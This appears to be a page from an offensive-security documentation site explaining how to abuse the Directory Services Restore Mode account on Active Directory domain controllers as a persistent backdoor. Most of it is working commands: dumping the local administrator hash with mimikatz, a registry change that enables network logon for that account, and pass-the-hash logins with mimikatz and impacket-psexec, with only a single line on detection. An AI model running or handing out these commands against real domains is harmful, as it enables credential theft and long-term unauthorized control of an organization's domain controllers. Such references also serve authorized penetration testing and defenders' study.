> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# DSRM

> DSRM: abuse Directory Services Restore Mode password for Domain Controller backdoor access.

## Overview

Every DC has a local DSRM administrator account set during AD DS promotion. Its NTLM hash can be extracted and used to authenticate to the DC.

***

## Get DSRM Password Hash

```cmd theme={"dark"}
mimikatz # token::elevate
mimikatz # lsadump::sam
```

Look for local `Administrator` account hash.

***

## Enable Network DSRM Login

By default, DSRM account can only log in during DSRM boot mode. Change registry to allow network logon:

```cmd theme={"dark"}
reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v DsrmAdminLogonBehavior /t REG_DWORD /d 2
```

| Value | Behavior                    |
| ----- | --------------------------- |
| 0     | Only in DSRM boot (default) |
| 1     | When AD DS is stopped       |
| 2     | Always (what we want)       |

***

## Authenticate with DSRM Hash

```cmd theme={"dark"}
mimikatz # sekurlsa::pth /domain:DC_HOSTNAME /user:Administrator /ntlm:DSRM_HASH /run:cmd.exe
```

```bash theme={"dark"}
impacket-psexec -hashes :DSRM_HASH ./Administrator@DC_IP
```

Use `./` (local) not `DOMAIN/` — DSRM is local account.

***

## Notes

* DSRM password rarely changed → long-term persistence
* Local account — use `.\Administrator` or hostname
* Survives reboots
* Requires registry change for remote access
* Detection: monitor DsrmAdminLogonBehavior registry key

***

## Quick Reference

| Task          | Command                                        |
| ------------- | ---------------------------------------------- |
| Get hash      | `mimikatz # lsadump::sam` on DC                |
| Enable remote | Set `DsrmAdminLogonBehavior = 2`               |
| Login         | PtH with `./Administrator` (local, not domain) |
